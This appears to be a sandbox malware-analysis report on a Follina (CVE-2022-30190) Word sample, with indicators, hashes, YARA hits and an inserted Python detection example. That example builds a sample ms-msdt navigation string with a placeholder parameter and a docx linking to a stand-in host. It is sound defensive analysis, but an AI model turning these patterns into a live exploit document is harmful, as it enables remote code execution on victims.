https://login.windows.net/common/oauth2/authorize | 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr | false |  | high
https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile | 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr | false | URL Reputation: safe | unknown
https://graph.windows.net/ | 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr | false |  | high
https://api.powerbi.com/beta/myorg/imports | 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr | false |  | high
https://devnull.onenote.com | 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr | false |  | high
https://ncus.pagecontentsync. | 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr | false | URL Reputation: safe | unknown
https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json | 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr | false |  | high
https://messaging.office.com/ | 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr | false |  | high
https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile | 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr | false |  | high
https://augloop.office.com/v2 | 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr | false |  | high
https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing | 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr | false |  | high
https://skyapi.live.net/Activity/ | 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr | false | URL Reputation: safe | unknown
https://clients.config.office.net/user/v1.0/mac | 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr | false |  | high
https://dataservice.o365filtering.com | 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr | false | URL Reputation: safe | unknown
[IP distribution map legend: No. of IPs < 25%; 25% < No. of IPs < 50%; 50% < No. of IPs < 75%; 75% < No. of IPs]

IP | Domain | Country | ASN | ASN Name | Malicious
45.32.185.177 | unknown | United States | 20473 | AS-CHOOPAUS | true
Joe Sandbox Version: 35.0.0 Citrine
Analysis ID: 640804
Start date and time: 2022-06-07 17:38:36 +02:00
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 7m 59s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: doc1712.docx
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Run name: Potential for more IOCs and behavior
Number of new started processes analysed: 32
Number of new started drivers analysed: 1
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal72.expl.evad.winDOCX@17/32@0/1
EGA Information: Failed
HDC Information: Failed
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 0
• Number of non-executed functions: 0
                                                                                                                                                          Cookbook Comments:
                                                                                                                                                          • Found application associated with file extension: .docx
                                                                                                                                                          • Adjust boot time
                                                                                                                                                          • Enable AMSI
                                                                                                                                                          • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                                                                          • Attach to Office via COM
                                                                                                                                                          • Scroll down
                                                                                                                                                          • Close Viewer
                                                                                                                                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, sdiagnhost.exe, mrxdav.sys, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
                                                                                                                                                          • Excluded IPs from analysis (whitelisted): 52.109.32.63, 52.109.88.37, 52.109.12.21, 52.109.76.33, 52.109.88.39, 52.109.12.23
                                                                                                                                                          • Excluded domains from analysis (whitelisted): www.bing.com, client.wns.windows.com, fs.microsoft.com, prod-w.nexus.live.com.akadns.net, prod.configsvc1.live.com.akadns.net, ctldl.windowsupdate.com, arc.msn.com, ris.api.iris.microsoft.com, licensing.mp.microsoft.com, store-images.s-microsoft.com, login.live.com, als-online.org, config.officeapps.live.com, sls.update.microsoft.com, nexus.officeapps.live.com, displaycatalog.mp.microsoft.com, officeclient.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, europe.configsvc1.live.com.akadns.net
                                                                                                                                                          • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                          • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                          No simulations
Match | Associated Sample Name / URL | Detection | Context
45.32.185.177 | doc1712.docx | malicious |
No context
Match | Associated Sample Name / URL | Detection | Context
AS-CHOOPAUS | V7crqFDfGz | malicious | 44.168.169.116
 | doc1712.docx | malicious | 45.32.185.177
 | Rechnungs-Details.xls | malicious | 103.43.75.120
 | 2022-06-06_0952.xls | malicious | 103.43.75.120
 | 5W7po4UYqL.dll | malicious | 103.43.75.120
 | njeDT3V9p7.dll | malicious | 103.43.75.120
 | ki25afhS4E.dll | malicious | 103.43.75.120
 | W5trAFh08y.dll | malicious | 103.43.75.120
 | 9OPQr4rhqD.dll | malicious | 103.43.75.120
 | yfaiqQneQ2.dll | malicious | 103.43.75.120
 | 8KhF3IfznX.dll | malicious | 103.43.75.120
 | ScKZlpWYdS.dll | malicious | 103.43.75.120
 | 9OPQr4rhqD.dll | malicious | 103.43.75.120
 | tY0zfRmSRS.dll | malicious | 103.43.75.120
 | L6fx4ToLni.dll | malicious | 103.43.75.120
 | LmrrOI.dll | malicious | 103.43.75.120
 | pxcCHjhf2y.dll | malicious | 103.43.75.120
 | ErFwhF10ZN.dll | malicious | 103.43.75.120
 | oYVKIInuqU.dll | malicious | 103.43.75.120
 | RechnungScan_2022_06_9523033179.xls | malicious | 103.43.75.120
No context
Match | Associated Sample Name / URL | Detection | Context
C:\Windows\Temp\SDIAG_466c2050-93b8-4fd4-9932-b9db6d401695\DiagPackage.dll | R346ltaP9w.rtf | malicious |
 | VIP Invitation to Doha Expo 2023.docx | malicious |
 | WykHEO9BQN.rtf | malicious |
 | lol666 (2).bat | malicious |
 | EISPv0c56U.doc | malicious |
 | mjpoc_slide.doc | malicious |
 | mjpoc_slide.doc | malicious |
 | 05-2022-0438.doc | malicious |
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                            File Type:Microsoft Access Database
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):528384
                                                                                                                                                                            Entropy (8bit):0.47595568823682505
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:384:UGfXMHJC6U8SFBfZ0jGB/AA0P5W8wtZ1Iw+hVZO4Fg:ffX0CxHFZdAvPI8/7I
                                                                                                                                                                            MD5:4ECC580D048E8C68E78F7DA0E417B6DB
                                                                                                                                                                            SHA1:95C378C97B039A0F5DDDB7A2F8577D38D36F6813
                                                                                                                                                                            SHA-256:17C979A2C5C303EA177312CC2988C96C95F5BDE8EE5FFAA5B55FDD4796D0EA56
                                                                                                                                                                            SHA-512:948B26A4DFAE242593C8E51A0DB68ACF8B8E493BD7A6FCF80CFBA62F0C2D476B9E9AF0990DF5B10EFA7784F69E6ED172BC0152C0921FEAFFFCFA9433F70F7B58
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:....Standard ACE DB......n.b`..U.gr@?..~.....1.y..0...c...F...N)U.7...i.(...`.:{6Z...Z.C`..3..y[=.|*..|......%V...f_...$.g..'D...e....F.x....-b.T...4.0.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                            File Type:data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):36
                                                                                                                                                                            Entropy (8bit):2.730660070105504
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:3:5NixJlElGUR:WrEcUR
                                                                                                                                                                            MD5:1F830B53CA33A1207A86CE43177016FA
                                                                                                                                                                            SHA1:BDF230E1F33AFBA5C9D5A039986C6505E8B09665
                                                                                                                                                                            SHA-256:EAF9CDC741596275E106DDDCF8ABA61240368A8C7B0B58B08F74450D162337EF
                                                                                                                                                                            SHA-512:502248E893FCFB179A50863D7AC1866B5A466C9D5781499EBC1D02DF4F6D3E07B9E99E0812E747D76734274BD605DAD6535178D6CE06F08F1A02AB60335DE066
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:C.e.n.t.r.a.l.T.a.b.l.e...a.c.c.d.b.
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                            File Type:data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):64
                                                                                                                                                                            Entropy (8bit):1.3860360556164644
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:3:ulXHaV:uNu
                                                                                                                                                                            MD5:334DB8E86457CD1A976CA2A0E56AB93C
                                                                                                                                                                            SHA1:533C32C7E721C1742FBBEA46D50B4EC6BDA19733
                                                                                                                                                                            SHA-256:4FB2CE4D568A646BE624CFD303E2B09958AC724B3C78FC5F88D36D2781F19F38
                                                                                                                                                                            SHA-512:19178D6A265883E64F27A189A7E1E1A64ABFE57485E06DC3A28C0BD3AD41A8D2921ECA4478B95F97AA47D04C7F61F1AD08F24D002826C718AE1CB73A596BBF67
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:642294. Admin.
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                            File Type:XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):147863
                                                                                                                                                                            Entropy (8bit):5.358968341475212
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:1536:jcQW/gxgB5BQguw//Q9DQW+zQWk4F77nXmvidQXxUETLKz6e:6HQ9DQW+zIXLI
                                                                                                                                                                            MD5:22DC37BD9827F0F05F504ADBE67007D1
                                                                                                                                                                            SHA1:3200F0F1E2A190F3A906C1A2A1119C3E36272560
                                                                                                                                                                            SHA-256:0CBB981F4187FA754C92D82B560F24AF441558066D7FE647DE005C933001D7CF
                                                                                                                                                                            SHA-512:3FEEAA1E468E6DC4A955D17722089407EC34BAADC1D60616D0B90468983E707FB3CB7F64D7E9873319C457C2C5BC9A801A14B412103E1B0A846DD5179CCCDF56
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:<?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2022-06-07T15:39:56">.. Build: 16.0.15330.30525-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                            File Type:HTML document, ASCII text, with very long lines, with CRLF line terminators
Category:dropped
Size (bytes):5889
Entropy (8bit):4.705994860110501
Encrypted:false
SSDEEP:96:t/iGBF2nPW5mDtWID8qImz1I8vHWYMLJS2lpyffnbTc7Oi/EAEwC8EA5KiSe+0gR:tJ5mDtWIDu0GTl9EHbTcKeZEwC8EaKio
MD5:EA48F95AB4F3CA3B0C687A726CB00C49
SHA1:C473DB9C4D460D3F7801B506F289C04A04D3A50F
SHA-256:CDEC208EC12FA58C122DB1887ABB7F58C7998A9BA6EEEBFFC501E11DE3975215
SHA-512:394E847B28549EF616F9CD1CA613B20BB318194A3A6B749A8156319A9CBFAC35CC0C44251A3CCBC14ECB7CF79F86816C7BB971DA5719D1FB8E1E51581F964470
Malicious:true
Yara Hits:
• Rule: MAL_Msdt_MSProtocolURI_May22, Description: Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\1FD46902.htm, Author: Tobias Michalski, Christian Burkard
• Rule: JoeSecurity_Follina, Description: Yara detected Microsoft Office Exploit Follina / CVE-2022-30190, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\1FD46902.htm, Author: Joe Security
Preview:<!doctype html>..<html lang="en">..<head>..<title>..Good thing we disabled macros..</title>..</head>..<body>..<p>..Lorem ipsum dolor sit amet, consectetur adipiscing elit. Quisque pellentesque egestas nulla in dignissim. Nam id mauris lorem. Nunc suscipit id magna id mollis. Pellentesque suscipit orci neque, at ornare sapien bibendum eu. Vestibulum malesuada nec sem quis finibus. Nam quis ligula et dui faucibus faucibus. In quis bibendum tortor.....Curabitur rutrum leo tortor, venenatis fermentum ex porttitor vitae. Proin eu imperdiet lorem, ac aliquet risus. Aenean eu sapien pharetra, imperdiet ipsum ut, semper diam. Nulla facilisi. Sed euismod tortor tortor, non eleifend nunc fermentum sit amet. Integer ligula ligula, congue at scelerisque sit amet, porttitor quis felis. Maecenas nec justo varius, semper turpis ut, gravida lorem. Proin arcu ligula, venenatis aliquam tristique ut, pretium quis velit.....Phasellus tristique orci enim, at accumsan velit interdum et. Aenean nec tristique

Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
File Type:HTML document, ASCII text, with very long lines, with CRLF line terminators
Category:dropped
Size (bytes):5889
Entropy (8bit):4.705994860110501
Encrypted:false
SSDEEP:96:t/iGBF2nPW5mDtWID8qImz1I8vHWYMLJS2lpyffnbTc7Oi/EAEwC8EA5KiSe+0gR:tJ5mDtWIDu0GTl9EHbTcKeZEwC8EaKio
MD5:EA48F95AB4F3CA3B0C687A726CB00C49
SHA1:C473DB9C4D460D3F7801B506F289C04A04D3A50F
SHA-256:CDEC208EC12FA58C122DB1887ABB7F58C7998A9BA6EEEBFFC501E11DE3975215
SHA-512:394E847B28549EF616F9CD1CA613B20BB318194A3A6B749A8156319A9CBFAC35CC0C44251A3CCBC14ECB7CF79F86816C7BB971DA5719D1FB8E1E51581F964470
Malicious:true
Yara Hits:
• Rule: MAL_Msdt_MSProtocolURI_May22, Description: Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\7F7F7060.htm, Author: Tobias Michalski, Christian Burkard
• Rule: JoeSecurity_Follina, Description: Yara detected Microsoft Office Exploit Follina / CVE-2022-30190, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\7F7F7060.htm, Author: Joe Security
Preview:<!doctype html>..<html lang="en">..<head>..<title>..Good thing we disabled macros..</title>..</head>..<body>..<p>..Lorem ipsum dolor sit amet, consectetur adipiscing elit. Quisque pellentesque egestas nulla in dignissim. Nam id mauris lorem. Nunc suscipit id magna id mollis. Pellentesque suscipit orci neque, at ornare sapien bibendum eu. Vestibulum malesuada nec sem quis finibus. Nam quis ligula et dui faucibus faucibus. In quis bibendum tortor.....Curabitur rutrum leo tortor, venenatis fermentum ex porttitor vitae. Proin eu imperdiet lorem, ac aliquet risus. Aenean eu sapien pharetra, imperdiet ipsum ut, semper diam. Nulla facilisi. Sed euismod tortor tortor, non eleifend nunc fermentum sit amet. Integer ligula ligula, congue at scelerisque sit amet, porttitor quis felis. Maecenas nec justo varius, semper turpis ut, gravida lorem. Proin arcu ligula, venenatis aliquam tristique ut, pretium quis velit.....Phasellus tristique orci enim, at accumsan velit interdum et. Aenean nec tristique

Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
File Type:data
Category:dropped
Size (bytes):2130
Entropy (8bit):1.1445888158572237
Encrypted:false
SSDEEP:6:/9IqgHu42sarhYkIuvgB4PxZUtr1iI5lN24NLRUlQ/lfEz/RUlQ/lflKDmPm1SX7:mbb2sOhYk5vnZABylAlY/ylAldIQ5
MD5:CB0C468E9D00224731A0494B8123745C
SHA1:738594A3EB858A1304DFD02265CD9AFC0BE694E0
SHA-256:A7B0CDD9C0B709F34CEC39E2509F16DEC6651ED2C3E3B9675854F2E78E506F55
SHA-512:C45B702DADD517480D71D8D78973C1DB13D3F93A4F204F188101F0D399422248360B22F448DDB859C4F5DE3A16E6FB3B6BBDEF265624FC7935F9C206470C9C7F
Malicious:false
Preview:....S.H.A.P.E. .X. .\.*. .M.E.R.G.E.F.O.R.M.A.T... . ...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................0...2...6...D...F...D...F...J...N...P.............................................................................................................................................................................................................................................................................................................................................................................................................................j....U....j....U...*....j....U

Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
File Type:data
Category:dropped
Size (bytes):1024
Entropy (8bit):0.05390218305374581
Encrypted:false
SSDEEP:3:ol3lYdn:4Wn
MD5:5D4D94EE7E06BBB0AF9584119797B23A
SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
Malicious:false
Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
File Type:HTML document, ASCII text, with very long lines, with CRLF line terminators
Category:dropped
Size (bytes):5889
Entropy (8bit):4.705994860110501
Encrypted:false
SSDEEP:96:t/iGBF2nPW5mDtWID8qImz1I8vHWYMLJS2lpyffnbTc7Oi/EAEwC8EA5KiSe+0gR:tJ5mDtWIDu0GTl9EHbTcKeZEwC8EaKio
MD5:EA48F95AB4F3CA3B0C687A726CB00C49
SHA1:C473DB9C4D460D3F7801B506F289C04A04D3A50F
SHA-256:CDEC208EC12FA58C122DB1887ABB7F58C7998A9BA6EEEBFFC501E11DE3975215
SHA-512:394E847B28549EF616F9CD1CA613B20BB318194A3A6B749A8156319A9CBFAC35CC0C44251A3CCBC14ECB7CF79F86816C7BB971DA5719D1FB8E1E51581F964470
Malicious:true
Yara Hits:
• Rule: MAL_Msdt_MSProtocolURI_May22, Description: Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\123[1].RES, Author: Tobias Michalski, Christian Burkard
• Rule: JoeSecurity_Follina, Description: Yara detected Microsoft Office Exploit Follina / CVE-2022-30190, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\123[1].RES, Author: Joe Security
Preview:<!doctype html>..<html lang="en">..<head>..<title>..Good thing we disabled macros..</title>..</head>..<body>..<p>..Lorem ipsum dolor sit amet, consectetur adipiscing elit. Quisque pellentesque egestas nulla in dignissim. Nam id mauris lorem. Nunc suscipit id magna id mollis. Pellentesque suscipit orci neque, at ornare sapien bibendum eu. Vestibulum malesuada nec sem quis finibus. Nam quis ligula et dui faucibus faucibus. In quis bibendum tortor.....Curabitur rutrum leo tortor, venenatis fermentum ex porttitor vitae. Proin eu imperdiet lorem, ac aliquet risus. Aenean eu sapien pharetra, imperdiet ipsum ut, semper diam. Nulla facilisi. Sed euismod tortor tortor, non eleifend nunc fermentum sit amet. Integer ligula ligula, congue at scelerisque sit amet, porttitor quis felis. Maecenas nec justo varius, semper turpis ut, gravida lorem. Proin arcu ligula, venenatis aliquam tristique ut, pretium quis velit.....Phasellus tristique orci enim, at accumsan velit interdum et. Aenean nec tristique

Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
File Type:HTML document, ASCII text, with very long lines, with CRLF line terminators
Category:dropped
Size (bytes):5889
Entropy (8bit):4.705994860110501
Encrypted:false
SSDEEP:96:t/iGBF2nPW5mDtWID8qImz1I8vHWYMLJS2lpyffnbTc7Oi/EAEwC8EA5KiSe+0gR:tJ5mDtWIDu0GTl9EHbTcKeZEwC8EaKio
MD5:EA48F95AB4F3CA3B0C687A726CB00C49
SHA1:C473DB9C4D460D3F7801B506F289C04A04D3A50F
SHA-256:CDEC208EC12FA58C122DB1887ABB7F58C7998A9BA6EEEBFFC501E11DE3975215
SHA-512:394E847B28549EF616F9CD1CA613B20BB318194A3A6B749A8156319A9CBFAC35CC0C44251A3CCBC14ECB7CF79F86816C7BB971DA5719D1FB8E1E51581F964470
Malicious:false
Preview:<!doctype html>..<html lang="en">..<head>..<title>..Good thing we disabled macros..</title>..</head>..<body>..<p>..Lorem ipsum dolor sit amet, consectetur adipiscing elit. Quisque pellentesque egestas nulla in dignissim. Nam id mauris lorem. Nunc suscipit id magna id mollis. Pellentesque suscipit orci neque, at ornare sapien bibendum eu. Vestibulum malesuada nec sem quis finibus. Nam quis ligula et dui faucibus faucibus. In quis bibendum tortor.....Curabitur rutrum leo tortor, venenatis fermentum ex porttitor vitae. Proin eu imperdiet lorem, ac aliquet risus. Aenean eu sapien pharetra, imperdiet ipsum ut, semper diam. Nulla facilisi. Sed euismod tortor tortor, non eleifend nunc fermentum sit amet. Integer ligula ligula, congue at scelerisque sit amet, porttitor quis felis. Maecenas nec justo varius, semper turpis ut, gravida lorem. Proin arcu ligula, venenatis aliquam tristique ut, pretium quis velit.....Phasellus tristique orci enim, at accumsan velit interdum et. Aenean nec tristique
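
The four HTML drops above (1FD46902.htm, 7F7F7060.htm and the two 123[1].RES copies, all the same SHA-256) are the page Word fetched through the document's external reference, and the YARA hits on them fire on the ms-msdt: URI that sits past the lorem-ipsum padding shown in the preview. What follows is an added example, not code from this report, from Joe Security or from the YARA rule authors: it reproduces both halves of that triage offline, pulling external oleObject targets out of a .docx and flagging the ms-msdt: markers in the fetched HTML. The sample HTML, the minimal sample .docx and the URL http://example.invalid/123.RES are constructed here, and the 4 KiB padding check is a heuristic from public write-ups, not something this report states.

```python
"""
Added example (not from the report, and not the YARA rules' logic):
recover the external oleObject target from a .docx and flag the
ms-msdt: markers in the HTML it fetches. Sample inputs are constructed.
"""
import io
import re
import zipfile
import xml.etree.ElementTree as ET

PKG_NS = "{http://schemas.openxmlformats.org/package/2006/relationships}"
OLE_REL = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject"

# Constructed stand-in for the dropped HTML: filler prose like the report's
# preview, then an ms-msdt: navigation. The /param value is a placeholder,
# not a working payload.
FILLER = "Lorem ipsum dolor sit amet, consectetur adipiscing elit. " * 80
SAMPLE_HTML = (
    '<!doctype html>\n<html lang="en"><head>'
    "<title>Good thing we disabled macros</title></head>\n"
    "<body><p>" + FILLER + "</p>\n<script>\n"
    'window.location.href = "ms-msdt:/id PCWDiagnostic /skip force '
    '/param \\"IT_BrowseForFile=PLACEHOLDER\\"";\n'
    "</script></body></html>\n"
)

MARKERS = {
    "ms_msdt_uri": re.compile(r"ms-msdt:", re.I),
    "pcwdiagnostic": re.compile(r"PCWDiagnostic", re.I),
    "browse_for_file": re.compile(r"IT_(?:Re)?BrowseForFile", re.I),
    "script_navigation": re.compile(r"location(?:\.href)?\s*=", re.I),
}


def scan_html(html: str) -> dict:
    """Per-marker hits plus a verdict. 'padded' encodes the widely reported
    observation that Word's HTML engine acts on the page only once it is a
    few KiB long; it is a heuristic from public write-ups, not a rule."""
    size = len(html.encode("utf-8"))
    found = {name: bool(rx.search(html)) for name, rx in MARKERS.items()}
    found["size"] = size
    found["padded"] = size >= 4096
    found["verdict"] = found["ms_msdt_uri"] and (found["pcwdiagnostic"] or found["script_navigation"])
    return found


def external_ole_targets(docx_bytes: bytes) -> list:
    """URLs of oleObject relationships with TargetMode="External": the hook a
    Follina document uses to have Word pull the HTML from a remote host."""
    targets = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        for name in z.namelist():
            if not (name.startswith("word/") and name.endswith(".rels")):
                continue
            root = ET.fromstring(z.read(name))
            for rel in root.iter(PKG_NS + "Relationship"):
                if rel.get("Type") == OLE_REL and rel.get("TargetMode") == "External":
                    targets.append(rel.get("Target"))
    return targets


def build_sample_docx(target: str = None) -> bytes:
    """Constructed minimal package holding only the part this check reads
    (a real .docx has many more parts); target=None means no external link."""
    rels = [
        '<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/>'
    ]
    if target is not None:
        rels.append('<Relationship Id="rId2" Type="%s" Target="%s" TargetMode="External"/>' % (OLE_REL, target))
    xml = ('<?xml version="1.0" encoding="UTF-8" standalone="yes"?>\n'
           '<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">\n'
           + "\n".join(rels) + "\n</Relationships>")
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("word/_rels/document.xml.rels", xml)
    return buf.getvalue()


if __name__ == "__main__":
    docx = build_sample_docx("http://example.invalid/123.RES")  # constructed URL
    for url in external_ole_targets(docx):
        print("external oleObject target:", url)
    print(scan_html(SAMPLE_HTML))
```

On a real sample, feed the .docx bytes to external_ole_targets and the cached HTML (here the INetCache copies) to scan_html; a document with an external oleObject relationship pointing at an HTTP host, together with an ms-msdt: marker in what that host serves, is the pairing the two YARA rules above describe.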

Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x4b2, 9 symbols
Category:dropped
Size (bytes):1368
Entropy (8bit):4.108156724577044
Encrypted:false
SSDEEP:24:HTi3W9olAg9NqXgHOFhKdofeI+ycuZhNsvakSHIPNnq9Yld:Q/T+XguzKum1ul8a3Qq9YP
MD5:46E1987205445B6455828795311B41F1
SHA1:67399B55265526324775B02D77CE67910F00CC02
SHA-256:277C0BA9EF14053CE547B95F1ACF8BE4BB96F4B56FE2B5B5302398B4EC91BD33
SHA-512:15082D856FFA14B677932F7F1856D08EDBFF3BC4BB5766FE9427B7BF2499257AEDF4C6967AE132B550233455131C4E412FB44609D6C68113A421308E2F46D507
Malicious:false
Preview:L.....b.............debug$S........t...................@..B.rsrc$01........X.......X...........@..@.rsrc$02........P...b...............@..@........U....c:\Users\user\AppData\Local\Temp\qe5jzpda\CSC4563D2ED18334995B732DDC516AA1E81.TMP.......................@.<.B.:L..........5.......C:\Users\user\AppData\Local\Temp\RES374A.tmp.-.<...................'...Microsoft (R) CVTRES...=..cwd.C:\Windows\TEMP\SDIAG_466c2050-93b8-4fd4-9932-b9db6d401695.exe.C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe..............................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...q.e.5.j.z.p.d.a...d.l.l.....(.....L.e.g.a.l.C.

Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x4b2, 9 symbols
Category:dropped
Size (bytes):1368
Entropy (8bit):4.1016590014719485
Encrypted:false
SSDEEP:24:Hii3W9ohbKZqH5qhKdofeI+ycuZhNEakSQPNnq9Yld:T/0sZAKum1ulEa3Iq9YP
MD5:5138C19164E397DB350D16515434E5CF
SHA1:9946106498C217FA887CC1982CC1D4DE3067075A
SHA-256:C77A4D04F1502A89AE9E6DB47DEB005131A537A87EDAE6C3EF77ACE22C87E153
SHA-512:B5C8959E8929CED41FD39142B476C24CEC1E04AE279D6A4292615756482AC7D95368351C83E7D0432ABD0042FB0362E5F0621D1D06EE27D97B8D95DF2B1C4067
Malicious:false
